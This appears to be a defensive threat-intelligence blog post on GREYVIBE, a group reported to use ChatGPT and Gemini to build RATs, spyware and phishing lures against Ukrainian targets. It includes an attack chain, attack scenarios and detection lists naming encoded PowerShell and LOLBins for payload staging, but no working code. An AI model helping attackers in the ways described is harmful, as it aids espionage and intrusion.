GREYVIBE Hackers Use ChatGPT and Gemini to Power Cyberattacks

Meta Description

GREYVIBE hackers are using ChatGPT and Google Gemini to launch AI-powered cyberattacks targeting Ukraine. Learn what happened, who is at risk, and how to defend your organization.

 Introduction

A newly identified threat group called GREYVIBE is actively using generative AI tools, including ChatGPT and Google Gemini, to plan, build, and execute cyberattacks at scale.

This is not a theoretical risk. GREYVIBE hackers leveraging ChatGPT and Gemini to fuel cyberattacks has been confirmed by researchers at WithSecure, who tracked the group across multiple campaigns since at least August 2025.

The targets are real. Ukrainian government agencies, military organizations, and civilian institutions are in the crosshairs. But the implications stretch far beyond Ukraine's borders.

This campaign signals something broader and more dangerous: the democratization of sophisticated cyberattack capabilities through AI.

What Happened

WithSecure researchers identified GREYVIBE as a previously untracked threat actor with consistent overlaps in infrastructure, tooling, and operational behavior across several distinct campaigns.

The group was not on anyone's radar before this disclosure. That alone should make security teams pause.

Key facts about the GREYVIBE campaign:

• Active since: At least August 2025
• Primary targets: Ukrainian government, military, and civilian sectors
• AI tools abused: ChatGPT, Google Gemini, and Ideogram AI
• Malware deployed: PhantomRelay (Windows RAT), FallSpy (Android spyware), LegionRelay (PowerShell RAT)
• Delivery methods: Spear-phishing, fake CAPTCHA pages, fraudulent websites
• Attribution indicators: Russian-language artifacts, Moscow time zone activity patterns, targeting aligned with Russian state interests

No definitive attribution has been confirmed. However, the group's behavior strongly aligns with Russian intelligence-gathering objectives tied to the ongoing Russia-Ukraine conflict.

Technical Analysis

This is where things get technically significant. GREYVIBE is not just a standard espionage group. They have integrated generative AI into nearly every stage of the attack lifecycle.

The Attack Chain

Stage 1: Initial Access

GREYVIBE employs a multi-vector approach to initial access:

• Spear-phishing emails impersonating Ukrainian government agencies
• Malicious archives distributed via legitimate cloud services such as Google Drive
• Fake CAPTCHA verification pages designed to trick users into executing malicious commands
• Fraudulent "adult club" websites specifically targeting Ukrainian military personnel

Stage 2: AI-Assisted Malware Development

This is the critical differentiator. WithSecure researchers found evidence of AI-generated code patterns inside GREYVIBE's custom tools:

• The DAYLIGHT and TEASOUP loaders contain AI-generated obfuscation code
• LegionRelay, a custom PowerShell-based remote access trojan, shows clear markers of LLM-assisted development
• Phishing lure content, including imagery, was generated using Ideogram AI
• ChatGPT and Gemini appear to have been used for code generation, lure writing, and post-compromise task support

Stage 3: Payload Execution

Once victims interact with the phishing lure or fake CAPTCHA, the following occurs:

• Custom loaders silently execute in the background
• Decoy documents are displayed to the victim to avoid suspicion
• The infection chain initiates without triggering obvious alerts

Stage 4: Persistence and Lateral Movement

After initial compromise, GREYVIBE establishes persistent footholds using:

• LegionRelay for ongoing remote access via PowerShell
• WebSocket-based command execution through PhantomRelay
• File theft, screenshot capture, and messaging data exfiltration

Root Cause

The root cause of GREYVIBE's growing capability is AI-assisted development. The group demonstrates signs of limited technical sophistication in some areas. Yet their tools are functional, modular, and evolving rapidly because generative AI is compensating for skill gaps.

AI also makes traditional attribution harder. When code is AI-generated, fingerprinting threat actors through coding style becomes unreliable.

Malware Breakdown

PhantomRelay:

• Modular Windows remote access trojan (RAT)
• Uses WebSockets for command and control communication
• Enables remote command execution, file access, and data exfiltration

FallSpy:

• Android spyware targeting mobile devices
• Exfiltrates contacts, GPS location, and device metadata
• Delivered through deceptive social engineering websites

LegionRelay:

• Custom PowerShell-based RAT
• Supports file theft and screenshot capture
• Exfiltrates data from messaging applications
• Contains a design flaw that exposed backend functionality to researchers

Security Implications

The design flaw in LegionRelay is worth noting for a different reason. It actually enabled WithSecure to monitor GREYVIBE's operations over an extended period. This is a double-edged sword: AI-assisted development accelerates tool creation but can also introduce flaws that defensive researchers exploit for intelligence gathering.

Why GREYVIBE Hackers Using ChatGPT and Gemini Matters to Your Organization

You might think this is a Ukraine-specific problem. It is not.

Enterprise impact:

• AI-generated spear-phishing lures are more convincing, harder to detect, and faster to produce at scale
• Traditional signature-based detection struggles with AI-obfuscated loaders
• Attribution becomes harder when AI removes human coding fingerprints
• Any organization with geopolitical relevance or connections to defense, energy, or government is a potential target

SMB impact:

• Smaller organizations often lack the detection capabilities to catch AI-assisted social engineering
• Credential theft via AI-polished phishing emails bypasses basic security awareness training
• Limited SOC resources make threat hunting for new, untracked groups extremely difficult

Cloud security implications:

• GREYVIBE abused Google Drive to distribute malicious archives
• Legitimate cloud services are being weaponized to bypass perimeter controls
• Cloud-delivered malware bypasses many traditional network security tools

Financial and regulatory risks:

• Data exfiltration from a GREYVIBE-style attack can trigger GDPR, HIPAA, or NIS2 obligations
• Ransomware follow-on activity is a realistic escalation path
• Incident response costs following a modular RAT compromise can run into six figures

Five Realistic GREYVIBE Attack Scenarios

Scenario 1: Government Agency Spear-Phishing

An attacker uses ChatGPT to craft a hyper-targeted spear-phishing email impersonating a senior official from a partner government agency. The email contains a Google Drive link to a malicious archive. The victim opens the document and sees a legitimate-looking decoy. PhantomRelay quietly installs in the background.

Scenario 2: Military Personnel Social Engineering via Fake Website

A Ukrainian military officer visits what appears to be a legitimate social or entertainment website. The site, built by GREYVIBE, delivers FallSpy to the officer's Android device. Location data, contacts, and device information are immediately exfiltrated to threat actor infrastructure.

Scenario 3: Fake CAPTCHA Delivering Command Execution

An employee at a civilian organization receives a link to what appears to be a document verification portal. The portal presents a fake CAPTCHA that instructs the user to paste a command into their terminal "to verify they are human." Executing the command installs LegionRelay and establishes persistent attacker access.

Scenario 4: Supply Chain Lateral Movement

GREYVIBE compromises a contractor with access to a government agency's internal systems. Using LegionRelay, the threat actor performs lateral movement across the supply chain network, stealing credentials and staging further access into the primary target environment.

Scenario 5: AI-Generated Phishing at Scale

Using Gemini to write content and Ideogram AI to generate convincing imagery, GREYVIBE launches a mass phishing campaign across hundreds of targets simultaneously. The AI-generated lures bypass traditional email security filters because they contain no known malicious signatures or reused content.

Detection and Monitoring Strategies

Detecting GREYVIBE-style AI-powered threats requires layered visibility. Here is what security teams should prioritize.

Logging Recommendations

• Enable full PowerShell script block logging and module logging across all endpoints
• Log all outbound WebSocket connections at the network perimeter
• Enable Windows Event IDs 4688 (process creation) and 4104 (PowerShell execution)
• Log all cloud storage access events from Google Drive and similar platforms

EDR Monitoring

• Alert on PowerShell spawning from unusual parent processes
• Monitor for encoded command execution (-EncodedCommand flag in PowerShell)
• Flag any process injecting into legitimate Windows processes
• Detect anomalous use of certutil, mshta, regsvr32 for payload staging

SIEM Correlation Rules

• Correlate cloud storage downloads followed by new process creation within short time windows
• Alert on multiple failed authentication attempts followed by successful logins from unusual geolocations
• Flag outbound connections to newly registered or low-reputation domains
• Correlate CAPTCHA-related page visits with subsequent unusual command execution

Threat Hunting Guidance

• Hunt for PowerShell scripts containing Base64-encoded strings communicating over WebSockets
• Search for recently created scheduled tasks or registry run keys not aligned with known software
• Look for Android device management traffic patterns inconsistent with corporate MDM profiles
• Hunt for AI-generated content markers in phishing emails using LLM detection tooling

Identity Security Monitoring

• Monitor for credential stuffing patterns against authentication portals
• Alert on service account usage outside of normal operational hours
• Enforce conditional access policies blocking logins from unexpected geographies
• Review OAuth application permissions granted by users across cloud platforms

Mitigation Recommendations

Immediate actions:

• Audit all email security controls and update anti-phishing policies to account for AI-generated content
• Block execution of PowerShell from user-writable directories
• Review and restrict cloud storage sharing permissions across all platforms
• Implement application whitelisting on endpoints where possible

Patching and hardening:

• Ensure all endpoints are running current OS and application patches
• Disable unnecessary scripting engines on endpoints not requiring them
• Harden Android device policies via MDM to restrict sideloading and unknown sources
• Review and restrict macro execution in Office documents

Zero Trust and segmentation:

• Apply Zero Trust principles to all remote access workflows
• Segment networks to prevent lateral movement from compromised endpoints
• Enforce least-privilege access across all user and service accounts
• Implement microsegmentation in cloud environments

MFA and identity controls:

• Enforce phishing-resistant MFA (FIDO2 or hardware token) on all privileged accounts
• Implement MFA for all cloud storage access
• Conduct access reviews to remove stale accounts and excessive permissions
• Monitor for impossible travel and unusual authentication patterns

Detection and response preparation:

• Deploy EDR with behavioral detection across all endpoints including mobile
• Establish runbooks specifically for AI-assisted phishing and RAT compromise scenarios
• Test incident response procedures against scenarios involving modular RAT toolkits
• Validate backup integrity and test restoration procedures

Threat hunting and intelligence:

• Subscribe to threat intelligence feeds covering Russian-aligned threat actors
• Actively hunt for GREYVIBE indicators of compromise across your environment
• Brief security awareness teams on AI-generated phishing characteristics
• Share threat intelligence with sector peers and government CERTs

Why Cybersecurity Teams Should Pay Attention to GREYVIBE Hackers Using ChatGPT and Gemini

The GREYVIBE story is not just about one threat group. It is a preview of the threat landscape every security team will face over the next several years.

The broader trend is clear: generative AI is lowering the technical barrier to entry for cyberattacks. GREYVIBE demonstrates that even a group showing signs of operational immaturity can deploy modular malware, conduct multi-vector campaigns, and evade attribution when AI fills the skill gaps.

For SOC teams, this means alert fatigue will increase as AI enables volume attacks with highly varied lure content. For penetration testers and red teams, it means the adversary simulation bar is rising. For DevSecOps teams, it means security tooling that relies on static signatures or behavioral fingerprints will need to evolve.

What this means strategically:

• AI-generated phishing will soon make traditional security awareness training partially obsolete
• Threat attribution will become harder and slower as AI removes human fingerprints from malware
• The attack surface is expanding as threat actors simultaneously abuse multiple AI platforms
• Defenders need AI-powered detection to match AI-powered offense

The lesson from GREYVIBE is not to fear AI. It is to understand that the same tools your organization might use for productivity are now being weaponized by threat actors. That asymmetry demands a proactive, intelligence-led security posture.

Key Takeaway:

The emergence of GREYVIBE hackers using ChatGPT and Gemini to fuel cyberattacks is a watershed moment in modern cyber warfare. It confirms what many in the security community feared: generative AI is actively accelerating offensive cyber operations in real-world conflict zones.

This is not a future risk. It is happening now, with real malware, real victims, and real geopolitical consequences.

Key lessons for security teams:

• AI-assisted threat actors can operate at higher sophistication levels than their underlying skills suggest
• Multi-vector campaigns combining spear-phishing, fake CAPTCHAs, and social media social engineering are increasingly common
• Modular malware ecosystems like PhantomRelay, FallSpy, and LegionRelay are designed for persistence and adaptability
• AI-generated code complicates attribution and challenges signature-based defenses
• Even imperfect threat actors can cause significant damage with AI assistance

Long-term implications:

Security teams must treat AI-assisted threat activity as the new baseline, not the exception. Invest in behavioral detection, threat intelligence, and Zero Trust architecture now. Organizations that continue to rely on legacy perimeter security and static signature detection will find themselves increasingly exposed.

Proactive guidance:

• Assume AI-generated phishing will reach your users
• Build detection logic around behavior, not signatures
• Treat cloud storage platforms as potential malware delivery vectors
• Conduct regular red team exercises simulating AI-assisted attack chains